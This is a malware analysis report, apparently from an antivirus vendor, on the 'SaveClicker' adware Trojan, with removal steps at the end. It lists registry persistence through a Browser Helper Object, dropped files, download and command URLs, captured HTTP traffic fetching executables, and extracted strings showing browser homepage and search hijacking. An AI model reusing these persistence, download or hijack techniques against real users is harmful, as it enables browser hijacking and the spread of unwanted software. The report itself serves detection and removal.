[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}\VersionIndependentProgID]
"(Default)" = "SaveClicker"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"NoRepair" = "1"
"InstallDate" = "20141109"

[HKCR\Interface\{7041156A-0D2B-4DCD-A8EE-D0608BFCB2D0}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"Publisher" = "SaveClicker"

[HKCR\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}\1.0\HELPDIR]
"(Default)" = "%Program Files%\SaveClicker"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"UninstallString" = "%Documents and Settings%\All Users\Application Data\SaveClicker\gzfJ2GIHr9X.exe /s /n /i:ExecuteCommands;UninstallCommands %Documents and Settings%\All Users\Application Data\SaveClicker\gzfJ2GIHr9X.exe"

[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}]
"(Default)" = "SaveClicker"

[HKCR\Interface\{7041156A-0D2B-4DCD-A8EE-D0608BFCB2D0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{9B41579A-1996-42F9-8F84-7B7786818CEF}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}\ProgID]
"(Default)" = "SaveClicker.2.1"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{23153046-D029-C7B7-DBB6-A2E4110CD348}]
"(Default)" = "SaveClicker"

"NoExplorer" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{23153046-D029-C7B7-DBB6-A2E4110CD348}]
[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}\InprocServer32]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{AAB19F20-AC4F-4764-BD8B-8E4C43B27ABD}Machine\Software\Policies]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{AAB19F20-AC4F-4764-BD8B-8E4C43B27ABD}Machine]
[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}\ProgID]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{AAB19F20-AC4F-4764-BD8B-8E4C43B27ABD}Machine\Software\Policies\Google\Chrome]
[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}\VersionIndependentProgID]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{23153046-D029-C7B7-DBB6-A2E4110CD348}]
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{AAB19F20-AC4F-4764-BD8B-8E4C43B27ABD}Machine\Software\Policies\Google]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{23153046-D029-C7B7-DBB6-A2E4110CD348}]
[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}\Programmable]
[HKCR\CLSID\{23153046-D029-C7B7-DBB6-A2E4110CD348}]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{AAB19F20-AC4F-4764-BD8B-8E4C43B27ABD}Machine\Software]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{AAB19F20-AC4F-4764-BD8B-8E4C43B27ABD}User]

Dropped PE files

MD5	File path
707cf330c992e956de01af4e0185473e	c:\Documents and Settings\All Users\Application Data\SaveClicker\gzfJ2GIHr9X.exe
2b03146531dd5016ed68d30abf45ab58	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\4t0K2gExXKV.exe
b32be388c4974d9b74f9782afeea865b	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\tf00294823.dll
016e2afa52b828aa94ff7c032ee3d607	c:\Program Files\SaveClicker\vWxdeLnb7d.dll
a8e1f929a0dfb4ce5a6d7d2576a53133	c:\Program Files\SaveClicker\vWxdeLnb7d.x64.dll
b32be388c4974d9b74f9782afeea865b	c:\Program Files\Supporter\Supporter.dll
def1475f3f2c0ef8f462b3b4730f1d96	c:\Program Files\Supporter\SupporterSvc.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: AsInbuilt
Product Name: Of Hierarchic
Product Version: 1.3.4.3
Legal Copyright: Copyright 2011
Legal Trademarks:
Original Filename: TMPS.EXE
Internal Name: Of Hierarchic
File Version: 5.4.6.1
File Description: Of Hierarchic
Comments:
Language: English (United Kingdom)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	185689	185856	4.55475	b814aae66d19358199cd2211ad0eb588
.data	192512	183348	183808	4.97466	aee90c4f5926fe07a52bb09c03b1ecd7
.rsrc	376832	6564	6656	3.61584	cfeee301e73bf9a1661a7b30190aacac
.reloc	385024	6658	7168	3.43485	8f42dd784ac95c14a6e3692d6a4a89f1

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://download.saveclickersoft.info/?e=savec2&clsb=1&sfx=1&prv=SaveClicker&publisher=11104&hid=14882537320847316088&cht=2&dcu=1&cpatch=2&dcs=1&pf=1	162.210.193.206
hxxp://support.saveclickersoft.info/	104.28.1.111
hxxp://support.saveclickersoft.info/support.exe	104.28.1.111
datadownloadscan.info	95.211.159.5
time.windows.com	64.4.10.33

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /support.exe HTTP/1.1

Accept: */*

Accept-Encoding: gzip,deflate,sdch

Host: support.saveclickersoft.info

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36


HTTP/1.1 200 OK

Date: Sun, 09 Nov 2014 02:19:44 GMT

Content-Type: application/octet-stream

Content-Length: 5141504

Connection: keep-alive

Set-Cookie: __cfduid=dab5762686c0ddd2f2243027c9556b2ab1415499584123; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.saveclickersoft.info; HttpOnly

Last-Modified: Wed, 13 Aug 2014 11:58:05 GMT

Accept-Ranges: bytes

Server: cloudflare-nginx

CF-RAY: 186686f0c9db047f-FRA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........b..E..PE..P
E..P..2PY..P..0P...P..1P...PL{[email protected]..,PH..P..6PD..P..
3PD..PRichE..P........PE..L...Y..R......................F.............
[email protected]...@.......................
..........\...<.......0 D...................M..C...................
...............P...@............................................text..
............................. ..`.rdata...........0..................@
[email protected]........ [email protected] D......"D..t.....
.........@[email protected][email protected].................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U......E......E......E.
[email protected].;E.s..E..E....3E..E..E.i......E....E...U.....E.@@.
E..E.H.E..}..v..E......M.;.u..E.....3.].U..Q...E.@@.E..E.@@.E..E.H.E..
}..v4.E.....M....;.t".E.....M....;.}..M.....E......E.....3...U...E...P
.u..u..\......].U...E...P.u..u.........].U..Q.E..E....E.@@.E..E.H.E..}
..v..E.f.M.f.....E...U..3.].U.......].U...E.].U..].U..Q.}..u..e.....u.
.u..u..........E..E...U..Q.E......u..e.....u......Y.E..E...U..Q.}..u..
E..E....u..u..u..........E..E...U..Q.}..u..e.....u..E....P.u..U...<<< skipped >>>

GET / HTTP/1.1

Accept: */*

Accept-Encoding: gzip,deflate,sdch

Host: support.saveclickersoft.info

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36


HTTP/1.1 302 Moved Temporarily

Date: Sun, 09 Nov 2014 02:19:44 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=dff2c39febf5d1fb1387cf25411e01dd71415499583997; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.saveclickersoft.info; HttpOnly

X-Powered-By: PHP/5.4.19

location: support.exe

Server: cloudflare-nginx

CF-RAY: 186686effe1f047f-FRA

0..HTTP/1.1 302 Moved Temporarily..Date: Sun, 09 Nov 2014 02:19:44 GMT
..Content-Type: text/html..Transfer-Encoding: chunked..Connection: kee
p-alive..Set-Cookie: __cfduid=dff2c39febf5d1fb1387cf25411e01dd71415499
583997; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.savecli
ckersoft.info; HttpOnly..X-Powered-By: PHP/5.4.19..location: support.e
xe..Server: cloudflare-nginx..CF-RAY: 186686effe1f047f-FRA..0..

GET /?e=savec2&clsb=1&sfx=1&prv=SaveClicker&publisher=11104&hid=14882537320847316088&cht=2&dcu=1&cpatch=2&dcs=1&pf=1 HTTP/1.1

Accept: */*

Accept-Encoding: gzip,deflate,sdch

Host: download.saveclickersoft.info

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36


HTTP/1.1 200 OK

Content-Length: 2853888

Content-Type: application/octet-stream

Content-Disposition: attachment; filename="Uqy9hDqdTY.exe"

Content-Transfer-Encoding: binary

Access-Control-Allow-Origin: *

Date: Sun, 09 Nov 2014 02:19:33 GMT

Connection: keep-alive

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......u..t1..'1..'
1..'..l'(..'..n'...'..o'L..'8.2'4..'1..'Q..'.8n'0..'.8r'8..'1..'3..'.8
h'0..'.8m'0..'Rich1..'........PE..L...4.^T.....................2).....
..............@...........................,....... ...@...............
...................B*.<..... ....................... .h............
[email protected]..........................
..text............................... ..`.rdata....'.......'..........
.......@[email protected]*..^...@*[email protected]......... ....
...*.............@[email protected].... ..j..." [email protected].........
......................................................................
......................................................................
......................................................................
......................................................................
.................................................D$...t...PRQ.M.......
.....D$...t...PRQ..............D$..8.u.3..P.)...Y.....B...D$..V......B
.t.V.Y...Y..^....T$..A.;B.u...;[email protected]$..T$....H....U..QQ.u...
.u..U.R.P.............D$.;H.u...;[email protected]
.......Y..u..L.C..M.P......e...M..E......E.d.............B......QV...u
..M...E......B.t.V.y...Y.M...^d.............B..f...Q.M..M......B..M.d.
........\.C...Q.B..<...Q.e..W3.G9}.u..M.hh.C..C......u..u..%....e..
.M..}..E._d.............B......QV...u..M...E......B.t.V.....Y.M...

<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_1904:

.text

`.data

.rsrc

@.reloc

.fff.

L$T~.fffff.

C".Uc?(

Lto.hx

)1mSg~j

.ya6N

S.fh?r

&MQ4%X0J

%uuJo

€u>

D(.ug

M%s6~

L}'.Xn

.eLkg

.cg"_

{0xx, 0xx}

zcÁ

1.0.6, 6-Sept-2010

combined CRCs: stored = 0xx, computed = 0xx

` C %d work, %d block, ratio %5.2f

od bytes: mapping %d,

6Rselectors %d,

c,, %d pointers, %d sorted, %d scanned

final combined CRC = 0xx

%d in block, %d after MTF & 1-2 coding, %d 2 syms in use

[%d: huff mtf

depth m has

GetProcessWindowStation

codes %d

_A_EDD block %d: crc = 0xx, combined CRC = 0xx, size = %d

b pass %d: size is %d, grp uses are

code lengths %d,

qsort [0x%x, 0x%x] done %d this %d

bzip2/libbzip2: internal error number %d.

This is a bug in bzip2/libbzip2, %s.

Please report it to me at: [email protected]. If this happened

component, you should also report this bug to the author(s)

of that program. Please make an effort to report this bug;

timely and accurate bug reports eventually lead to higher

.AI= s s

m unresolved strings

Y@ initial group %d, [%d .. %d], has %d syms (%4.1f%%)

(VVV.memtest86.com). At the time of writing it is free (GPLd).

rr.aOvi H

c:\%original file name%.exe

GetProcessHeap

KERNEL32.dll

GetCPInfo

<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false" />

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /></application></compatibility></assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD

31912<9<

@mscoree.dll

- CRT not initialized

- Attempt to initialize the CRT more than once.

- floating point support not loaded

kernel32.dll

USER32.DLL

5.4.6.1

TMPS.EXE

1.3.4.3

wuauclt.exe_1968:

.text

`.data

.rsrc

@.reloc

wuauclt.pdb

GetProcessHeap

KERNEL32.dll

_wcmdln

_amsg_exit

msvcrt.dll

ntdll.dll

ole32.dll

RegCloseKey

RegOpenKeyExW

RegCreateKeyExW

ADVAPI32.dll

USER32.dll

OLEAUT32.dll

SHLWAPI.dll

zcÁ

version="6.0.0.0"

name="Microsoft.Windows.windowsupdate.wuauclt"

<windowsSettings>

<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>

</windowsSettings>

name="Microsoft.Windows.Common-Controls"

publicKeyToken="6595b64144ccf1df"

<requestedExecutionLevel

wuaueng.dll

Error: 0xx. wuauclt handler: failed to spawn COM server

Error: 0xx. wuauclt handler: failed to load wuaueng

/ReportNow

/ShowWindowsUpdate

/CloseWindowsUpdate

wuauclt.exe failed to get proc address for UI export object with error %#lx

Failed to load %s with error %X

wucltui.dll

wucltux.dll

call RunAUClientUI on wucltui.dll/wucltux.dll

Ntdll.dll

WuSqm %ls session datapoint (id:%d) is incremented with dword %d.

wuauclt.exe is exiting with code 0xX

wuauclt.exe launched with command line %s

kernel32.dll

WUWeb

Report

7.6.7600.256

Global\WindowsUpdateTracingMutex

WindowsUpdate.log

SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Trace

Windows

shell32.dll

%s: %s [

%s: %s

%s\%s

= Module: %s

= Module: <failed with %d>

= Process: %s

= Process: <failed with %d>

=========== Logging initialized (build: %s, tz: %s) ===========

wups2.dll

wups.dll

Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Setup\ServiceStartup\

%hs %ls page "%ls", hr=%X

Microsoft.WindowsUpdate

wupdmgr.exe

Failed to cocreate IShellWindows, error = 0xlX

Failed to obtain window doc for window %d, error = 0xlX

Failed to obtain folder view for window %d, error = 0xlX

Failed to obtain folder IPersist for window %d, error = 0xlX

Window %d is NOT a WU window

Done enumerating windows

Quit for window %d failed: 0xlX

Window %d is a WU window. Attempting to close

Failed to obtain class ID for window %d, error = 0xlX

Got NULL disp interface for window %d

Got %d instead of VT_DISPATCH for window %d

Failed to obtain IWebBrowserApp for window %d, error = 0xlX

Failed to enumerate window %d, error = 0xlX

Found %d explorer windows

Closing WU explorer windows

Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\VolatileData

WUAppNotificationWindows

SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired

SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired\Mandatory

SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\PostRebootReporting

SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\Pending\

%chdhd

hd-hd-hd%chd:hd:hd:hd

%WinDir%

Windows Update

7.6.7600.256 (winmain_wtr_wsus3sp2(oobla).120602-1459)

wuauclt.exe

Windows

Operating System

4t0K2gExXKV.exe_496:

.text

`.rdata

@.data

.rsrc

@.reloc

j.Yf;

_tcPVj@

.PjRW

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

GetProcessWindowStation

operator

()$^.* ?[]|\-{},:=!

dynamic load failed (x)

"%s"%s

^http[s]?://([^\/:\s] )(:[^\/\s] )?(\/?[^\s]*)$

\ux

GetProcessHeap

KERNEL32.dll

RegCreateKeyExW

RegDeleteKeyW

RegOpenKeyExW

RegEnumKeyExW

RegCloseKey

ADVAPI32.dll

GetCPInfo

zcÁ

/bi "legacy" /li 0 /ks 16   /path "$3\Assistant\Assistant.dll" /ax /sf /dn "Assistant" /sn "Assistant" /rp /rf /un /mf /xx /xy /rk "product_id" "Assistant" /pn "Verified Publisher" /id "0"

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT %d.%d)

HTTP/

%s=%s

POST %s HTTP/1.1

Host: %s

Content-Length: %d

Content-Type: application/x-www-form-urlencoded

%s=%s&version=4

foreverysun.info

proffidriversun.info

proffidrivergold.info

installdrivergold.info

installdrivermy.info

livedriverget.info

livedriverset.info

livedrivernet.info

drivernetuk.info

zillionnetuk.info

solutionnetuk.info

easyprobar.info

applicationfirst.info

applicationmyweb.info

Ð%d-%d %d | %d.%d (%d) | x86

Ð%d-%d %d | x86

skyprobar.info

def-1.80.1889 (primary) Feb 12 2014 19:33:02

hXXp://%s%s%s%c%s=%s&version=4

hXXp://%s%s%s&version=4

%Documents and Settings%\%current user%\Local Settings\Temp\4t0K2gExXKV.exe

?456789:;<=

!"#$%&'()* ,-./0123

'()*#$%&

>?:;<=9876540123,-./

<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />

mH}%xUb

=.TaMT

K9.PF

P`õ

rp%XT

%DH#c

S%SI{i

%UHj8j;

yl.wX'

X8%dIUMZ#

.Dr^A

~.eUL7

M.xiq

E.eEj

B .RH"

@P.fA

.zgtx

*U%SA

y>.HR

.eGk8

)c#Û

K2&8.OuI

%Y%X9c

.ho5s

|&E.xh

ú L

%Snyc

z"%xC

I4%FM

f.ui1

'o`5.iw

V.iu"

IR.KO

%x8!Li

\5%cv

.fMkVG5

[:_%X

,.LPmF

F`.Hb

#.OAO

%C)&P

]D-%C

l.nL90

.Npva

%DyLo

)E%Cq

.MZlFu&

b.Mt^

A.JAx#

.Tb)U

%u|<\i

%S(&%

-tjE}d

6%fO2

.fxDusR

A.FYp=

AhCEB%F

O.nhS7

n*$ %F

.sH}Lj

k:.Hg~)

%sOQ*J

Oudl%s(Q

wa.fu

?h.yg

t%uHSbR

%S`]\

QK U%s

<.xuD

R.Nns

v}:

@{%1XOm

Y<%Xw

.zmH,

Yr;%s!

.tySn

T.Bs>

D3%U3

Wuewz%f

F.fBJ

vd.vK

D.AZo#O

W}.hn

.BUWh

-h}Y)

6=%sK,

.eL l

oN2%f

U:3%D

F.vXB

%<.Ej

XO.oM

MSgU

x.ssu

-juR}

r}%fMR

`=.Zq

(Bi%XS

.Zmp4

t~4%f

!%UOyA

5%x 0L

r1.fMo

cq}OLp|%f

H<.TV6

[3.Xr4

v.pL}

,&.Ka

%Fz=[-&

u.zO )Y$O

1$.GX#

.rl-?

0`Z.qI[

\<5.Tv

n8.Vk1

u.UO

tS%XXH

:.DIy

.in!X

\FHm.yu

cEb.bQ1

-oCq}m

8.ZmYy

[.VPp)2

.etep

3@\%XJ'f

z#.bg"

n(my%S

0.IOp8<

xW.lJ

!L%fTv

:6.mD

owEb

"A.Ek3

_0oWeB!Mii,z

-rie}Q

8.Thj

d,%D!yj{

.jY\^

b.AQ2d

%f"FL\r

v "q.fW(

.zI2J:

`%uz!cj

.wJDLRM.

!O.Zk

u.khj

!8x%x

-<;%U5

f%c]B

:='CrT

.ED=j

sHWeb

.PSY5

w2; .BR

dF%SI

O'.ET

c`nD?.pE

yu.Mi

|T81}.pp<

k6.RA:

,lA-C}?

;{q.Oh

.ccLF

O{&%x

.FI\8

%F.(L

K%X\1*d

Yr6z-u.Se

.oapX

k<.uS

*i %x)

.kKEU

}I>^e%Fw

 .Hb;

3-n}Q

.HwDe

F-Y4}

%.rB`

9K`.Or

@e.DT

mfOm%s

Ý*V1c

xX%Cw4

AJl%x

X%Fg-

%c=GFep>

(oVr.slYi

n&%d=

=.NU=M

j]|65.RYB_A:G

'.au]

.WwjE

Vl%DHHL1

%dg29P

.lH,5

C>'%sn

"U%U&s

2.RK"y

ep%Xi

.hiX[Y

%U]J3

.dB@*|

%FV%M-

.AMt*

m>7H%x

.UmHE

z)2 RK}N.xY

R%Fj0

%.qfL

ML.OMsY

.TQ9O

FR.XW0x$L

.eE5-"

.Ov{h

|jL%F

I-%U7

W%U\%l

b'.XeH

}U%Fq

@Sö

.jd8FT

m.pzv

L%fUAM

,A.Hz2 H

ln.QJ

úYs\A

.lVu!R

b$B%u

cGP.xC,

%F`Eh

ÆMLW

_c%x_

%DqOXGW(

E%u]t

œ'Lf

*.Tu}

@h%d!m

wdqRm%5xc}\

U(p.mT1

Me.UJ

.jqMvm

.LDQA

r\.RQ

.tp<^

V}%|%F;q

/6TL].AHq

G%%1xL

}m.nE

%cxey

(.nrw

-pAG}

/L.ei

-zvi}u

y`.St

-p6J}

-saa}

%u%)7!

oY%xd<

>tU.Ls

.SPH|

.adbY

.ws%~p

-cyw}

=.BAN

.WNzb

.it^|

.KpB~

o}%c@w

:.WuQ

&<.pI

-%Sv-

.ZrUb

.LVfO

x].rR{)

Py.SQ

L%S]Y

4~"%X

:%sx.

dN.Ea

^.eg(

w6.GQK<^

lb.iy

5DO1t

-ENt}

,ö|

-TBb}

Eq:%u

SuRl

~%XQd

4-hp}

.lwSX

.Xqkg

na-f}

-xu}`e

z%st-n

ftpGGv~

%u!;0'45

Nc.Bt

Tr%Ud2

3 .oT.

.I~%SN

9.aLY

c.FSY

Ll|?z-~%d

2%U{o

k%Co{

#2%D-

'd.cb

vCMDF!

%Cu,^"D

_I.Ha

R{.RCW:\

.tY-#K

J.Qe@?

Q.idAn

%sQ-8

[4%Fz

B&?.ky

S%xnY

9?8ø

C.LM},

kc.Bv

&%sBZzp

9f7Â

8.NLu

uexE

.QK%p

.WEs%

#P.XO

Yb.gJ

.wn7M

 G0uL&iA.dl

;%Fkl

f?.bc

%c]p*

a.dnX

.vTCl

:ue.nu

%sC<,X

;d-4.lP

a\.PA

6%C"a

I*;q%X

ej W.tf/3m

/#%Up

R.Bts

.vd0sH

*t%Sd

X%dnK

X#.fu

.PzMwF

q.eX-

\%f}"

.WN7#

4%fM,

Y`%FW

94`3`25[

QJ[}.XgE?

s72.IGu

|;O%S

vZ@%D

Bb%fX?xV

.WB&M

xñ8

zBe%S.

E}ÿE

ok%f#-o#

.uCk&

.eK:{Hf

m6d.l%sfnK

X.XXX^

R`z.qT

mv2Iz%0sE

0>.YG3

.qp2"

).td5

V.Mlh

%x#/G^

7%CKi

iV%uW

URLw

<yœ

>.qvG

(o3h.Ng

MA3~s%u

.iv~G#

.XnN]RK

-D3};

.Ng7\*k~

J:U_%f

N.tw-GE

 %SZw

5.rM5

-hjV}

-Xf0}

-xug}w

-hqH}

-X}T}

-W-t}

-HYC}

-NeH}

-.mD}

-kef}

MSgy]

-Km5}

-hhD}

-XtJ}

? ?$?(?,?0?4?8?

1$1(1,101

=->3>?>[>

3.4.5|5]6m6

Ekernel32.dll

mscoree.dll

- CRT not initialized

- Attempt to initialize the CRT more than once.

- floating point support not loaded

portuguese-brazilian

USER32.DLL

%s\%s

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

USERENV.dll

%stfx.%s

%s/%s

[\^\.\$\|\(\)\[\]\{\}\*\ \?\/\\]

{5F189DF5-2D05-472B-9091-84D9848AE48B}

Global\u%s

ie:homepage_url

ie:search_url

ff:homepage_url

ff:search_url

chrome:homepage_url

chrome:search_txt

chrome:search_uid

chrome:search_url

chrome:search_ico

\x

SOFTWARE\%s\_x

SOFTWARE\AppDataLow\%s\_x

SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}

{77D46E27-0E41-4478-87A6-AABE6FBCF252}

{6F944A3B-154F-402C-8FAF-31D78D2113A9}

{71F281B8-2705-429D-BA65-5BEF850D787F}

{6791A2F3-FC80-475C-A002-C014AF797E9C}

{3DAFC8E5-2505-41FF-ABFC-EAECF8DB46D4}

{F0A61307-94CD-4F8E-94BC-918E511FAA81}

{6577B558-0B3A-4BE1-A0BD-1BF7896B7DB2}

{8F19E417-2A17-4563-BDBE-6B0D502195A1}

{C4DA09F7-0BCF-4B03-8AE8-176907B19DF2}

SOFTWARE\%s

%s.%x

SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}\%s

IESearchUrl

surl

FirefoxHomepage

FirefoxSearchEngineName

FirefoxSearchEngineIcon

FirefoxSearchUrl

Chrome

ChromeHomepage

ChromeSearchEngineName

ChromeSearchEngineIcon

ChromeSearchUrl

ChromeSearchInstantUrl

iurl

RUNDLL32.EXE

%s\SYSTEM32\RUNDLL32.EXE

%s\RUNDLL32.EXE

x-x-x

\__tmp_x

.__tmp_x

Assistant$.dll

%s\uninstall.exe

%s.x

SOFTWARE\AppDataLow\%s

"%s" "%s",_uninstall

%s /un

%s /un /uq

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

X%ddd

U%ddd

SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}

error: %s (v=x b='%s' p='%s')

ciexplore.exe

firefox.exe

chrome.exe

new_chrome.exe

u.exe

dragon.exe

torch.exe

Local\II%uII

;(\s|^)%s[^\s]*(\s|$)

%s\upd

%s\ini

chrome:search_fullname

chrome:search_url_instant

chrome:search_instanturl

global:tcp

WebPreserver

{771A53AF-D6BD-4B75-B7C1-D867456B810F}

{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}

{1146AC44-2F03-4431-B4FD-889BC837521F}

{B18C20BD-78D5-4391-BA0E-1659E61868A4}

{4DDA0E6F-5543-440C-BAA2-28BF01070AFA}

{E9C8031E-4963-4D48-8F87-108A30FFB076}

{423A0A37-0BF2-4422-9C2E-83EF50FF4269}

{19CD3583-B687-4FAA-9DB7-A49814B018BF}

SOFTWARE\%s\%s

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SProtector

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SP_%s

{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s{%s}

NTDLL.dll

\Internet Explorer\iexplore.exe

"%s" -k "%s"

rundll32.exe_892:

.text

`.data

.rsrc

msvcrt.dll

KERNEL32.dll

NTDLL.DLL

GDI32.dll

USER32.dll

IMAGEHLP.dll

rundll32.pdb

.....eZXnnnnnnnnnnnn3

....eDXnnnnnnnnnnnn3

...eDXnnnnnnnnnnnn,

.eDXnnnnnnnnnnnn,

%Xnnnnnnnnnnnnnnn1

O3$dS7"%U9

.manifest

5.1.2600.5512 (xpsp.080413-2105)

RUNDLL.EXE

Windows

Operating System

5.1.2600.5512

YThere is not enough memory to run the file %s.

Please close other windows and try again.

9The file %s or one of its components could not be opened.

0The file %s or one of its components cannot run.

MThe file %s or one of its components requires a different version of Windows.

UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"

Error in %s

Missing entry:%s

Error loading %s

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

%original file name%.exe:1904
qeO052T9N.exe:1356
rundll32.exe:892
rundll32.exe:1216
regsvr32.exe:1944
4t0K2gExXKV.exe:496
gzfJ2GIHr9X.exe:1288
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

%Documents and Settings%\%current user%\Local Settings\Temp\4t0K2gExXKV.exe (650324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qeO052T9N.exe (352986 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\install.rdf (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\vWxdeLnb7d.x64.dll (6338 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\lsdb.js (531 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\content.js (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\content\bg.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\vWxdeLnb7d.tlb (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\gzfJ2GIHr9X.exe (3863 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\vWxdeLnb7d.dll (3837 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\background.html (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\manifest.json (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\chrome.manifest (31 bytes)
